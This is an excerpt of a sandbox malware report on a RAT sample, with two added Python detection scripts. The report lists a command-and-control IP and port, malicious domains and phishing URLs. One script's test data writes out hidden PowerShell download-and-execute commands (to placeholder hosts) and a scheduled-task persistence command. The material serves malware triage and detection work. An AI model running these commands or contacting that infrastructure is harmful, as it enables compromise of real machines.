                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match | File source: ZzOTKK2V8l.exe, type: SAMPLE
Source: Yara match | File source: 0.2.ZzOTKK2V8l.exe.36ea760.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.ZzOTKK2V8l.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPED
Source: Yara match | File source: 0.2.ZzOTKK2V8l.exe.36ea760.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ZzOTKK2V8l.exe PID: 6368, type: MEMORYSTR
Source: ZzOTKK2V8l.exe, 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp; ZzOTKK2V8l.exe, 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp; AntiMalware.exe.0.dr | Binary or memory string: MSASCui.exe
Source: ZzOTKK2V8l.exe, 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp; ZzOTKK2V8l.exe, 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp; AntiMalware.exe.0.dr | Binary or memory string: procexp.exe
Source: ZzOTKK2V8l.exe, 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp; ZzOTKK2V8l.exe, 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp; AntiMalware.exe.0.dr | Binary or memory string: MsMpEng.exe
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
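The evidence behind this signature is three process names (Windows Defender's MSASCui.exe and MsMpEng.exe, and Sysinternals Process Explorer's procexp.exe) plus the root\SecurityCenter2 AntivirusProduct query, which is how a client enumerates registered AV products without touching vendor-specific APIs. One practical caveat when triaging a sample like this one, which ReversingLabs labels ByteCode-MSIL: .NET user strings are stored UTF-16LE in the assembly's #US heap, so an ASCII-only strings pass can miss exactly these indicators. The script below is an added example, not code from the Joe Sandbox report; the indicator list is taken from the rows above, and the sample blob it scans is constructed here to stand in for a memory dump.

```python
"""Triage check: find AV/analysis-tool process names and the SecurityCenter2
WMI query in a binary or memory dump, in both ASCII and UTF-16LE.
Added example; SAMPLE_BLOB is constructed test data, not sample memory."""
import re
from typing import Dict, List, Tuple

# Indicators from the report's "Binary or memory string" and WMI query rows.
INDICATORS = [
    "MSASCui.exe",
    "MsMpEng.exe",
    "procexp.exe",
    "root\\SecurityCenter2",
    "Select * from AntivirusProduct",
]


def _patterns() -> List[Tuple[str, re.Pattern, re.Pattern]]:
    """Compile each indicator as an ASCII and a UTF-16LE byte pattern."""
    pats = []
    for s in INDICATORS:
        ascii_re = re.compile(re.escape(s.encode("ascii")), re.IGNORECASE)
        utf16_re = re.compile(re.escape(s.encode("utf-16-le")), re.IGNORECASE)
        pats.append((s, ascii_re, utf16_re))
    return pats


def find_indicators(blob: bytes) -> Dict[str, List[str]]:
    """Return {indicator: [encodings it was found in]} for every hit."""
    hits: Dict[str, List[str]] = {}
    for name, a_re, u_re in _patterns():
        found = []
        if a_re.search(blob):
            found.append("ascii")
        if u_re.search(blob):
            found.append("utf-16le")
        if found:
            hits[name] = found
    return hits


def classify(hits: Dict[str, List[str]]) -> str:
    """Verdict: WMI AV enumeration combined with process-name checks is the
    security-software-discovery pattern the report flags; either alone is
    only suspicious."""
    wmi = any(k.startswith("root\\") or "AntivirusProduct" in k for k in hits)
    procs = [k for k in hits if k.lower().endswith(".exe")]
    if wmi and procs:
        return "security-software-discovery"
    if wmi or procs:
        return "suspicious"
    return "clean"


# Constructed blob: one ASCII string and two UTF-16LE strings between junk
# bytes, mimicking what a .NET process dump looks like (not real sample data).
SAMPLE_BLOB = (
    b"\x00" * 16
    + b"MsMpEng.exe"
    + b"\x90" * 8
    + "procexp.exe".encode("utf-16-le")
    + b"\xcc" * 4
    + "Select * from AntivirusProduct".encode("utf-16-le")
    + b"\x00" * 16
)

if __name__ == "__main__":
    h = find_indicators(SAMPLE_BLOB)
    for k, v in sorted(h.items()):
        print(f"{k}: {', '.join(v)}")
    print("verdict:", classify(h))
```

Run it against a raw process dump or the .unpack files listed above; a hit reported only as utf-16le is the case a plain `strings` run would have missed.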
ATT&CK matrix (Joe Sandbox grid, one tactic column per line, cells listed top to bottom; bracketed numbers are the signature-count badges reproduced exactly as they appear in the extracted report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Scripting [11]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation [131]; Native API [1]; Command and Scripting Interpreter [1]; Scheduled Task/Job [3]; PowerShell [1]; Scheduled Task; Systemd Timers
Persistence: Scripting [11]; DLL Side-Loading [1]; Scheduled Task/Job [3]; Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: DLL Side-Loading [1]; Process Injection [12]; Scheduled Task/Job [3]; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Disable or Modify Tools [1]; Obfuscated Files or Information [211]; Software Packing [1]; DLL Side-Loading [1]; Masquerading [1]; Virtualization/Sandbox Evasion [151]; Process Injection [12]
Credential Access: Input Capture [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: File and Directory Discovery [1]; System Information Discovery [24]; Query Registry [1]; Security Software Discovery [441]; Process Discovery [2]; Virtualization/Sandbox Evasion [151]; Application Window Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data [1]; Input Capture [1]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel [1]; Non-Standard Port [1]; Non-Application Layer Protocol [1]; Application Layer Protocol [1]; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph (ID 1447641; sample ZzOTKK2V8l.exe; start date 26/05/2024; architecture WINDOWS; score 100), rendered as text. Node numbers in brackets are the graph's; numbers after a process name are the graph's created-file / registry-value counters.

Contacted hosts: xcu5.exgaming.click; xcu.exgaming.click; bg.microsoft.map.fastly.net
Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 16 other signatures

Process tree:
- [10] ZzOTKK2V8l.exe (9)
    dropped: C:\Users\user\AppData\...\AntiMalware.exe, PE32+
    - [16] cmd.exe (1)
        - [25] AntiMalware.exe
            network: 94.156.65.172, remote port 4449, local port 49704, TERASYST-ASBG, Bulgaria
            - [44] cmd.exe
                signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
                - [47] conhost.exe
                - [49] powershell.exe
                - [51] powershell.exe
                - [53] 2 other processes
        - [38] 2 other processes
    - [18] cmd.exe (1)
        signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell); Uses schtasks.exe or at.exe to add and modify task schedules
        - [28] powershell.exe (14, 16)
        - [30] powershell.exe (16)
        - [32] powershell.exe (12)
        - [40] 2 other processes
    - [21] cmd.exe (1)
        - [34] conhost.exe
        - [36] schtasks.exe (1)
- [13] AntiMalware.exe (4), started from the graph's start node rather than as a child of [10]
    signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Machine Learning detection for dropped file
    - [23] cmd.exe
        - [42] 5 other processes
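The graph shows the chain a detection engineer wants to key on: the sample drops AntiMalware.exe under AppData\Roaming, relaunches it through cmd.exe, uses cmd.exe -> powershell.exe for download-and-execute, registers a scheduled task via schtasks.exe, and the dropped binary opens a TCP connection to 94.156.65.172 on 4449 (VenomRAT's default listener port). The following added example, not part of the Joe Sandbox report, rebuilds that tree from process-creation and network events and emits a finding for each of those behaviours. The event list is constructed to mirror the graph: node numbers are reused as PIDs, the command lines are illustrative stand-ins (the report does not reproduce the sample's real command lines in this section), and the download URL is a placeholder under example.invalid.

```python
"""Rebuild the process chain from the behaviour graph and flag the RAT pattern
it shows. Added example, not part of the Joe Sandbox report: node numbers are
reused as PIDs, command lines are constructed stand-ins, and the URLs are
placeholders (example.invalid)."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass
class Proc:
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str = ""
    children: List["Proc"] = field(default_factory=list)


# Constructed process-creation events: (pid, ppid, image, cmdline).
EVENTS: List[Tuple[int, Optional[int], str, str]] = [
    (10, None, r"C:\Users\user\Desktop\ZzOTKK2V8l.exe", ""),
    (16, 10, r"C:\Windows\System32\cmd.exe", "/c start AntiMalware.exe"),
    (18, 10, r"C:\Windows\System32\cmd.exe", "/c powershell ..."),
    (21, 10, r"C:\Windows\System32\cmd.exe", "/c schtasks ..."),
    (25, 16, r"C:\Users\user\AppData\Roaming\AntiMalware.exe", ""),
    (28, 18, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "-w hidden (New-Object Net.WebClient).DownloadFile("
     "'http://example.invalid/a', \"$env:TEMP\\a.exe\")"),
    (36, 21, r"C:\Windows\System32\schtasks.exe",
     "/create /sc minute /mo 1 /tn AntiMalware /tr "
     r"C:\Users\user\AppData\Roaming\AntiMalware.exe"),
    (44, 25, r"C:\Windows\System32\cmd.exe", "/c powershell ..."),
    (49, 44, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "-w hidden IEX ((New-Object Net.WebClient).DownloadString("
     "'http://example.invalid/b'))"),
]

# Constructed network event mirroring the graph: (pid, dst_ip, dst_port).
NET_EVENTS: List[Tuple[int, str, int]] = [(25, "94.156.65.172", 4449)]

DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest",
                    "invoke-expression", "iex ")
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\programdata\\", "\\temp\\")
VENOMRAT_DEFAULT_PORT = 4449


def build_tree(events) -> Dict[int, Proc]:
    """Index events by PID and link each process to its parent."""
    procs = {pid: Proc(pid, ppid, image, cmd) for pid, ppid, image, cmd in events}
    for p in procs.values():
        if p.ppid in procs:
            procs[p.ppid].children.append(p)
    return procs


def lineage(procs: Dict[int, Proc], pid: int) -> List[Proc]:
    """The process followed by its ancestors up to the root (self first)."""
    chain, cur = [], procs.get(pid)
    while cur is not None:
        chain.append(cur)
        cur = procs.get(cur.ppid) if cur.ppid is not None else None
    return chain


def from_user_writable(procs: Dict[int, Proc], pid: int) -> bool:
    """True if any process in the lineage runs from a user-writable path."""
    return any(any(m in p.image.lower() for m in USER_WRITABLE)
               for p in lineage(procs, pid))


def detect(procs: Dict[int, Proc], net_events) -> List[str]:
    """Return sorted findings for the behaviours the graph signatures name."""
    findings = set()
    for p in procs.values():
        img = p.image.lower()
        name = img.rsplit("\\", 1)[-1]
        cmd = p.cmdline.lower()
        if (name == "powershell.exe"
                and any(m in cmd for m in DOWNLOAD_MARKERS)
                and from_user_writable(procs, p.pid)):
            findings.add(f"pid {p.pid}: powershell download-and-execute "
                         f"under user-writable lineage")
        if (name == "schtasks.exe" and "/create" in cmd
                and from_user_writable(procs, p.pid)):
            findings.add(f"pid {p.pid}: scheduled task created from "
                         f"user-writable lineage")
        if "\\appdata\\roaming\\" in img and any(
                c.image.lower().endswith("\\cmd.exe") for c in p.children):
            findings.add(f"pid {p.pid}: AppData\\Roaming binary spawns cmd.exe")
    for pid, ip, port in net_events:
        p = procs.get(pid)
        if (p is not None and port == VENOMRAT_DEFAULT_PORT
                and from_user_writable(procs, pid)):
            findings.add(f"pid {pid}: outbound {ip}:{port} (VenomRAT default "
                         f"port) from {p.image}")
    return sorted(findings)


if __name__ == "__main__":
    tree = build_tree(EVENTS)
    for line in detect(tree, NET_EVENTS):
        print(line)
```

The lineage check is what keeps this from firing on every powershell.exe download on the estate: each rule requires that something in the ancestor chain runs from a user-writable path, which is true for both the Desktop-launched sample and the AppData\Roaming copy but not for a SYSTEM-owned management agent under Program Files. Feed it Sysmon event 1 and event 3 records (or EDR equivalents) in place of the constructed lists.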

Antivirus detection, submitted sample (Source | Detection | Scanner | Label):
ZzOTKK2V8l.exe | 50% | ReversingLabs | ByteCode-MSIL.Trojan.AsyncRAT
ZzOTKK2V8l.exe | 55% | Virustotal |
ZzOTKK2V8l.exe | 100% | Avira | HEUR/AGEN.1313069
ZzOTKK2V8l.exe | 100% | Joe Sandbox ML |

Antivirus detection, dropped file (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Roaming\AntiMalware.exe | 100% | Avira | HEUR/AGEN.1313069
C:\Users\user\AppData\Roaming\AntiMalware.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\AntiMalware.exe | 50% | ReversingLabs | ByteCode-MSIL.Trojan.AsyncRAT
C:\Users\user\AppData\Roaming\AntiMalware.exe | 55% | Virustotal |

No Antivirus matches

Antivirus detection, domains (Source | Detection | Scanner):
bg.microsoft.map.fastly.net | 0% | Virustotal
xcu5.exgaming.click | 0% | Virustotal
xcu.exgaming.click | 0% | Virustotal

Antivirus detection, URLs (Source | Detection | Scanner | Label):
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe

Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
xcu.exgaming.click | unknown | unknown | true | | unknown
xcu5.exgaming.click | unknown | unknown | true | | unknown

Contacted URLs (Name | Source | Malicious | Antivirus Detection | Reputation):
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ZzOTKK2V8l.exe, 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp; AntiMalware.exe, 00000012.00000002.4423691168.0000000003651000.00000004.00000800.00020000.00000000.sdmp; AntiMalware.exe, 00000012.00000002.4423691168.0000000003B27000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
94.156.65.172 | unknown | Bulgaria | 31420 | TERASYST-ASBG | true
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1447641
                            Start date and time:2024-05-26 09:46:05 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 9m 12s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:31
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Sample name:ZzOTKK2V8l.exe
                            renamed because original name is a hash value
                            Original Sample Name:c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@48/33@4/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 4
                            • Number of non-executed functions: 1
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 199.232.214.172
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
Time      Type             Description
03:46:51  API Interceptor  75x Sleep call for process: powershell.exe modified
03:46:59  API Interceptor  16035966x Sleep call for process: AntiMalware.exe modified
09:46:53  Task Scheduler   Run new task: AntiMalware path: "C:\Users\user\AppData\Roaming\AntiMalware.exe"
                            No context
Match: bg.microsoft.map.fastly.net
Associated Sample Name / URL | Detection | Threat Name | Context (IP)
kczvA4dhKH.exe | malicious | RedLine | 199.232.214.172
https://support-ads-team-34d19.firebaseapp.com/form-2122.html | malicious | Unknown | 199.232.210.172
https://support-ads-team-34d19.web.app/form-2122.html | malicious | Unknown | 199.232.214.172
http://metamask-wallet.org/ | malicious | Unknown | 199.232.214.172
http://worker-office-onedrive.td5xtn-b1lv7f1ymscd0.workers.dev/favicon.ico | malicious | HTMLPhisher | 199.232.210.172
https://roaring-starship.netlify.app/form.html | malicious | Unknown | 199.232.214.172
https://wsswsswsswss.github.io/myfirstswap | malicious | Unknown | 199.232.210.172
http://cn435-douglas.pages.dev/ | malicious | Unknown | 199.232.210.172
https://page-violation-information-form.vercel.app/ | malicious | HTMLPhisher | 199.232.210.172
https://www.onlinesiro.com.ar/wp-admin/css/colors/ocean/html/html/home/nkl-log.php/ | malicious | Unknown | 199.232.214.172
Match: TERASYST-ASBG
Associated Sample Name / URL | Detection | Threat Name | Context (IP)
nF54KOU30R.exe | malicious | RHADAMANTHYS | 94.156.67.91
Home Purchase Contract and Property Details.xls | malicious | Remcos, DBatLoader | 94.156.67.72
Swift mt103 483932024.vbs | malicious | GuLoader, Remcos | 94.156.67.228
1716402308262aedf7d56a024eb3c1ba5eacf734db4f110a1cdb89ce86eee5e5f3269b8667772.dat-decoded.exe | malicious | Remcos | 94.156.69.96
5021036673.exe | malicious | Nanocore, AgentTesla, PureLog Stealer | 94.156.68.219
hwUz69Q8ZN.exe | malicious | XWorm | 94.156.68.231
Swift copy.exe | malicious | XWorm | 94.156.68.231
IMG1024785000.exe | malicious | Nanocore, AgentTesla, PureLog Stealer | 94.156.68.219
15qMoP89vl.elf | malicious | Unknown | 94.156.68.228
ZQYQWLpDEQ.elf | malicious | Mirai, Okiru | 94.156.71.230
                            No context
                            No context
                            Process:C:\Users\user\AppData\Roaming\AntiMalware.exe
                            File Type:Unknown
                            Category:dropped
                            Size (bytes):69993
                            Entropy (8bit):7.99584879649948
                            Encrypted:true
                            SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                            MD5:29F65BA8E88C063813CC50A4EA544E93
                            SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                            SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                            SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                            Malicious:false
                            Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
                            Process:C:\Users\user\AppData\Roaming\AntiMalware.exe
                            File Type:Unknown
                            Category:dropped
                            Size (bytes):330
                            Entropy (8bit):3.225178845784375
                            Encrypted:false
                            SSDEEP:6:kKrtG9lEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:jtElbkPlE99SNxAhUeVLVt
                            MD5:AED8258A2610E662D45792A77021243F
                            SHA1:FCF64A276D007BEF5FA147A11CD3A4D740261D00
                            SHA-256:A2D2409D1C2960A0287039969C66AA9B91AE167B72C7BCC22576C1B877D0E9EA
                            SHA-512:11ACD0B25828719C55468C3A69435F971AA4B850E5E956FE8120717CF954699D498A30BAFC6A5E15D14E29330E41B1B2E4FC7D9229D853D6DCBCF4A91A2FDF7D
                            Malicious:false
                            Preview:p...... ........pE..@...(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                            Process:C:\Users\user\AppData\Roaming\AntiMalware.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):1281
                            Entropy (8bit):5.370111951859942
                            Encrypted:false
                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                            Process:C:\Users\user\Desktop\ZzOTKK2V8l.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):1281
                            Entropy (8bit):5.370111951859942
                            Encrypted:false
                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                            Malicious:false
